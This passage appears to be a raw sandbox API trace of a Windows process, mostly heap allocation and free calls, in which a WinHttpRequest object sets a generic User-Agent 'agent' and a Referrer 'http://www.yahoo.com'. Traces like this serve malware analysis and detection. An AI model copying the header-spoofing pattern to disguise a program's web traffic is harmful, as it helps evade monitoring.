returned 0xd01ad8 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5eb8 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda510 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda348 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01ad8 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddaa38 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2b8 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda360 | out: hHeap=0xcc0000) returned 1 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda378 | out: hHeap=0xcc0000) returned 1 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.300] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe4b0 | out: hHeap=0xcc0000) returned 1 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda390 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ad8 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xde67a0 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x22) returned 0xeeb890 [0273.301] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xd0dc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8df1b8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x8df2bc | out: rgDispId=0x8df2bc*=2) returned 0x0 [0273.301] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeeb890 | out: hHeap=0xcc0000) returned 1 [0273.301] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xd0dc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8df1b0 | out: ppTInfo=0x8df1b0*=0xe99284) returned 0x0 [0273.301] ITypeInfo:RemoteGetTypeAttr (in: This=0xe99284, ppTypeAttr=0x8df1a8, pDummy=0x356310 | out: ppTypeAttr=0x8df1a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalGetIDsOfNames (This=0xe99284) returned 0x0 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x0, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x1, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x2, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x3, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x4, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x5, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x6, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x7, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.301] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.301] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x8, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.302] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.302] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x9, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.302] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.302] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0xa, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.302] ITypeInfo:LocalReleaseTypeAttr (This=0xe99284) returned 0xea8b78 [0273.302] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.302] WinHttpRequest:IUnknown:Release (This=0xe99284) returned 0x1 [0273.302] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x34) returned 0xf16768 [0273.302] WinHttpRequest:IDispatch:Invoke (in: This=0xd0dc30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8df2a0*(rgvarg=([0]=0xf1676c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xf1677c*(varType=0x8, wReserved1=0x0, wReserved2=0x3534, wReserved3=0x322, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268, puArgErr=0x8df2b0 | out: pDispParams=0x8df2a0*(rgvarg=([0]=0xf1676c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xf1677c*(varType=0x8, wReserved1=0x0, wReserved2=0x3534, wReserved3=0x322, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8df2b0*=0x2b5995) returned 0x0 [0273.302] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xde67a0 | out: hHeap=0xcc0000) returned 1 [0273.303] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.303] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.303] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b28 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf16768 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.303] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda390 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf39068 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b58 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda510 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2b8 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa38 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5eb8 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a78 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0273.303] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.303] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0273.303] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b28 [0273.303] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda390 [0273.303] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01a78 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf39068 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5eb8 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda390 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xddaa38 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda2b8 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda510 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda348 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b58 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b58 | out: hHeap=0xcc0000) returned 1 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5ee0 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda258 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b58 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b58 | out: hHeap=0xcc0000) returned 1 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda270 [0273.304] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddaa20 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.304] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa38 | out: hHeap=0xcc0000) returned 1 [0273.305] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda510 | out: hHeap=0xcc0000) returned 1 [0273.305] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2b8 | out: hHeap=0xcc0000) returned 1 [0273.305] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.305] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5eb8 | out: hHeap=0xcc0000) returned 1 [0273.305] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda348 [0273.305] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b58 [0273.305] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xde67a0 [0273.305] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x22) returned 0xeeb890 [0273.305] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xd0dc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8df1b8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x8df2bc | out: rgDispId=0x8df2bc*=2) returned 0x0 [0273.305] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeeb890 | out: hHeap=0xcc0000) returned 1 [0273.305] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xd0dc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8df1b0 | out: ppTInfo=0x8df1b0*=0xe99284) returned 0x0 [0273.305] ITypeInfo:RemoteGetTypeAttr (in: This=0xe99284, ppTypeAttr=0x8df1a8, pDummy=0x356310 | out: ppTypeAttr=0x8df1a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.305] ITypeInfo:LocalGetIDsOfNames (This=0xe99284) returned 0x0 [0273.305] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x0, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.305] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.305] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x1, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.305] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.305] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x2, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x3, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x4, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x5, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x6, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x7, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x8, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x9, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0xa, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.306] ITypeInfo:LocalReleaseTypeAttr (This=0xe99284) returned 0xea8b78 [0273.306] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.306] WinHttpRequest:IUnknown:Release (This=0xe99284) returned 0x1 [0273.306] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x34) returned 0xf16768 [0273.307] WinHttpRequest:IDispatch:Invoke (in: This=0xd0dc30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8df2a0*(rgvarg=([0]=0xf1676c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xf1677c*(varType=0x8, wReserved1=0x0, wReserved2=0x3534, wReserved3=0x322, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268, puArgErr=0x8df2b0 | out: pDispParams=0x8df2a0*(rgvarg=([0]=0xf1676c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xf1677c*(varType=0x8, wReserved1=0x0, wReserved2=0x3534, wReserved3=0x322, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8df2b0*=0x2b5995) returned 0x0 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xde67a0 | out: hHeap=0xcc0000) returned 1 [0273.307] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda510 [0273.307] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddaa38 [0273.307] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ad8 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf16768 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b58 | out: hHeap=0xcc0000) returned 1 [0273.307] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda348 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda510 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf39068 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a78 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda258 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa20 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5ee0 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa38 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.307] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.307] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0273.307] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01ad8 [0273.307] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda348 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b28 [0273.308] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf39068 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5ee0 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda348 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddaa38 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda270 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xddaa20 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda258 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01a78 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda510 [0273.308] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a78 | out: hHeap=0xcc0000) returned 1 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5eb8 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda390 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01a78 [0273.308] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda510 | out: hHeap=0xcc0000) returned 1 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda510 [0273.308] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a78 | out: hHeap=0xcc0000) returned 1 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.308] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.308] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda510 | out: hHeap=0xcc0000) returned 1 [0273.308] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa38 | out: hHeap=0xcc0000) returned 1 [0273.308] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.309] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.309] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.309] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa20 | out: hHeap=0xcc0000) returned 1 [0273.309] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda258 | out: hHeap=0xcc0000) returned 1 [0273.309] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5ee0 | out: hHeap=0xcc0000) returned 1 [0273.309] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda258 [0273.309] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01a78 [0273.309] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xde67a0 [0273.309] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x22) returned 0xeeb890 